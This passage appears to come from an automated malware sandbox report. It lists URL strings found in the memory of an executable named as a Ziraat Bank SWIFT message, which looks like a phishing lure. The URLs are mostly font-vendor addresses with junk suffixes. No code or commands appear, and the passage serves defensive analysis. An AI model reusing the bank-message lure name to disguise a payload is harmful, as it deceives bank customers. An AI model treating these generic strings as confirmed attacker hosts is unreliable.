00000002.00000003.300258498.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300342875.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comce
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300141919.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300119023.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comfac
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300403427.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300428223.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300558881.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300634815.0000000006034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comhy/
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300331288.0000000006037000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300342875.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comily
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300403427.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300174244.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300428223.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301948951.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300331288.0000000006037000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301709757.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300233806.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300190057.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300258498.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300558881.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300141919.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301117508.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300849965.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301599425.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302181801.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301307567.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300634815.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301855291.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302114099.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301060629.0000000006033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comits
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300233806.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comitse
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299985983.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml-B(
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300403427.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300174244.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301530080.0000000006038000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300428223.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300331288.0000000006037000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301709757.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300233806.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300190057.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300258498.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300558881.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300141919.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301117508.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300849965.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301599425.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301307567.0000000006031000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300634815.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301060629.0000000006033000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300119023.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300099384.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300342875.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.compe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300342875.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comre
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300403427.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300174244.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299985983.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300428223.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300331288.0000000006037000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300233806.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300190057.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300258498.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300033238.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300141919.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300119023.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300099384.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300342875.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comsigW
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300331288.0000000006037000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300233806.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300190057.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300258498.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300342875.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comsign
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304677827.0000000006034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306012210.0000000006034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers%
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304296667.0000000006043000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304341992.0000000006043000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304099259.0000000006043000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304382226.0000000006043000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304209518.0000000006043000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304170705.0000000006043000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304435662.0000000006043000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.305767115.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.305003600.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.305032513.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.305068305.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304189881.0000000006034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersH
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.312655895.0000000006034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersW
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.312655895.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.312618448.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersiv
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comF
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comL.TTF
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.320113972.0000000006006000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.coma$
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.305767115.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comalicg
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comals$
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.305767115.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comdP
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.320113972.0000000006006000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comicu
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.320113972.0000000006006000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.coml1
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comm
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.commsedY
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comueedl
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297868606.000000000601B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297839542.000000000601B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.comcom
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299606103.0000000006033000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299501081.0000000006033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299462548.0000000006033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cntsP=
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299447483.0000000006033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cntsP=tx
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299447483.0000000006033000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299462548.0000000006033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnu-e
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308810403.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308658468.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308810403.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308658468.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/:
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308674164.0000000006012000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308958537.0000000006012000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309958548.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309176604.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309323595.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309409920.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309038359.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309119313.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308591362.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309275276.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309634439.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308723291.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309847410.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309538175.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308827341.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309771643.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308893439.0000000006034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmtr-tr
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300913114.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302653539.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302751937.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302146273.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301888455.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302492163.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302077028.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301987162.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301157376.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302242022.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302865321.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302414369.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302326537.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.303167686.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302564228.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.303077151.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302653539.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302751937.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302146273.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301888455.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302492163.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302077028.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.303316822.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301987162.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.303418082.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.303007184.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/$
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/0
